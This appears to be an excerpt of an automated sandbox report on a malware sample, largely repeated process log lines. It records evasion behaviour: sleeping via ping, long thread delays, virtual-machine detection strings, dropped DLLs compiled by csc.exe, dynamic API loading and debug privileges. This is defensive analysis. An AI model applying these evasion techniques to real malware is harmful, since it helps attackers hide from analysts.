Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116 Thread sleep count: 4466 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628 Thread sleep count: 4967 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\System32\loaddll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1549 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 614 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1341 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 359 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 382 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 899 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 571 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1971 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1192 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 2167 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1082 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1315 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1042 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 430 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6191 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3272 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4466 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4967 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\loaddll32.exe API coverage: 7.4 %
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_04B3B190
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_04B3B2F7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_04B4D39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_059EB190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_059FD39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_059EB2F7
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4FD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_04B4FD82
Source: explorer.exe, 0000001A.00000000.508501495.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001A.00000000.509648591.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001A.00000000.471555007.000000000D462000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ger_cw5n1h2txy
Source: explorer.exe, 0000001A.00000000.471555007.000000000D462000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
Source: explorer.exe, 0000001A.00000000.471555007.000000000D462000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.487107261.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.509648591.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000029.00000000.632215925.0000021DB5A53000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.487107261.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: loaddll32.exe, 00000001.00000003.446002874.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.522031967.00000000015BC000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000003.390361194.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.393979120.00000000015BC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USnl?'
Source: loaddll32.exe, 00000001.00000003.446002874.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.522031967.00000000015BC000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000003.390361194.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.393979120.00000000015BC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001A.00000000.467207350.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000001A.00000000.506666605.000000000D462000.00000004.00000001.sdmp Binary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.506666605.000000000D462000.00000004.00000001.sdmp Binary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
Source: explorer.exe, 0000001A.00000000.467207350.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001A.00000000.508501495.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 0000001A.00000000.475140198.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_04B4653E
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
